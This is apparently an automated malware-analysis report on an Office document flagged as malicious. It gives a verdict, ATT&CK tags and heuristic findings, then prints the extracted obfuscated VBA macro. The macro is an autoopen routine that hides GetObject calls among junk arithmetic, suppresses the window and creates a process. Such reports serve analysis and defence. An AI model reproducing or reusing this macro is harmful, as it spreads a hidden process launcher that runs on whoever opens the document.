Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present and uses a GetObject call, indicating an attempt to execute code. The presence of legacy WordBasic auto-exec markers and the critical ClamAV detection further support its malicious nature. The macro's obfuscation and its use of GetObject suggest it is designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Malware.Dsdu-6905405-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dsdu-6905405-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12497 bytes |

SHA-256: 9de68d5c71c8bce0aa769e92cddf18e3ebb8d55d290ee5f363ddab602a863dea
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "V_AQxA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QXBAAA"
Attribute VB_Base = "0{232B3040-6D07-46B7-8AEA-9D06B39D66BE}{2F1EA1D3-2399-4010-BF69-5157FE5CC004}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oC4B4A"
Sub autoopen()
On Error Resume Next
If LQkACU = FBAAA_AQ Then
w4XkGAC = (207318623)
FU_A4A = (A14QUGAQ * CInt(407771253 _
+ Atn(222480772 * oAQDQAA)) + RUABxAAD + CDbl(L1kAAc - Sqr(bDkUAk / _
CBool(955581245 / 287618393) + SwDkDA - Rnd(sCUCAAA))) * 115001129 * 886426616)
U1DDxUxA = (939469626)
End If
If VBxQQc = h4BABw Then
qU14Ao = (281614625)
HXoZBcA = (txxwDk * CInt(148996833 _
+ Atn(435203762 * ABAwAD)) + hZAQBA + CDbl(pAAAAA1 - Sqr(YABAA_A / _
CBool(944893507 / 60178560) + FcBACoAA - Rnd(XAAUADQ))) * 146479080 * 568305737)
Ro4X1x = (489054753)
End If
If SAwDwU = TUkwAcC Then
UDAUwA = (545227970)
LAUAoZ = (PABBCCU * CInt(676242049 _
+ Atn(2004818 * GxAxcD)) + wokcGBx + CDbl(uAZ4CBU - Sqr(cAAAUw / _
CBool(25682111 / 541253005) + d1UAAA - Rnd(JAAAAAC))) * 783889166 * 759727341)
IACoGQc = (321608616)
End If
Set zo4BBcGA = GetObject(Z__ZACZ + QXBAAA.i4xkAXUA + tAAcxoGA)
If sXDADkk = kQ_AU__ Then
d_AGCA = (288765909)
UB1QUQ_ = (uADAZGG * CInt(6970405 _
+ Atn(137712537 * nDDDAwC4)) + BoDAA1 + CDbl(ICCXc4 - Sqr(QCAxCAAQ / _
CBool(735086908 / 300383593) + aX4oDwoA - Rnd(oU_Bc1A))) * 564481517 * 130008187)
LocAA1DA = (549184604)
End If
If pZGwAowG = JxXAcC Then
YAGQkAo = (114579851)
bAABAXD1 = (Xo_AoXUw * CInt(829280736 _
+ Atn(859915205 * V4AZAx)) + R1ABAUB4 + CDbl(MUAUk4 - Sqr(vAXG1BA / _
CBool(414967801 / 842908985) + qADAQ4AU - Rnd(ZADQAAQ_))) * 720686101 * 492679830)
Vk_BGx = (317047363)
End If
If NAwDUAAA = TQxBX1oC Then
XQwDBk = (823700352)
kABAcDQ = (OwDDBAQA * CInt(153520158 _
+ Atn(939920494 * QXwQ1Z)) + p4Aokk + CDbl(sAQUAAG4 - Sqr(JAQACow / _
CBool(214387552 / 382535454) + HGBwAx - Rnd(Kc__AA))) * 102946009 * 167549854)
NZABA1 = (119247067)
End If
zo4BBcGA.ShowWindow = 298336 - 298336
If o1QG4cQ = uD1AAcX Then
WBwkAXUo = (399550076)
LUCUA1 = (UA4_Ak * CInt(81554373 _
+ Atn(842863109 * fDAwAU)) + hBACUB + CDbl(UXkoAA - Sqr(vABD1x / _
CBool(653588024 / 352182117) + ocwxAAAx - Rnd(iA_xxAU))) * 881236961 * 720215043)
zAA1Bo = (152773677)
End If
If PDcBBAA = ockBZQBB Then
BQQxAAAC = (723241726)
iUAAGXAU = (rDAUc4D1 * CInt(727216091 _
+ Atn(526127557 * RkBQDA)) + lXXAk1 + CDbl(rB1ok1X - Sqr(PAAAAcQ / _
CBool(444628792 / 429440776) + nABDQG - Rnd(IX4UABA))) * 144383498 * 239351901)
BAAAAA = (608721218)
End If
GetObject(W1GCBQ + QXBAAA.N_BDAoG + JDAAQAAU). _
Create@ DXBQA1A + QXBAAA.dxxQBQZA + nAAAAA_ + QXBAAA.RAAwQQ + vAADQUAQ + QXBAAA.zADUcAQA + UAADwkAo, ZD41XACA, zo4BBcGA, WDQBQU
If EAADBZA = GACU1Ak Then
aAwDA4_A = (496748349)
wCUAAAxc = (JcAQAcA * CInt(242897286 _
+ Atn(402902910 * wABwwx)) + uQxAAQX + CDbl(wckkoUAA - Sqr(ZAADDCA / _
CBool(950826652 / 896583089) + K1QDAoXA - Rnd(NAC1AXAD))) * 657129219 * 241113497)
YxcA_AwB = (584162951)
End If
If zBGkU4 = uUXBBwAA Then
iAACAA = (260027090)
kc14BAo = (iAQQAA4 * CInt(167038775 _
+ Atn(674351520 * mAA_xUG)) + FAoBA4 + CDbl(FA1cABB - Sqr(pAcDBAB / _
CBool(294797125 / 604420666) + rBB4Ao_A - Rnd(bBUxAxUB))) * 411144586 * 392351117)
TAUDGQ = (867134419)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/bd58ac5654864b1b8a1fa2aa3fa93b97.bin
' ===============================================================================
' Module streams:
' Macros/VBA/V_AQxA - 1104 bytes
' Macros/VBA/QXBAAA - 1157 bytes
' Macros/VBA/oC4B4A - 579
```

... (truncated)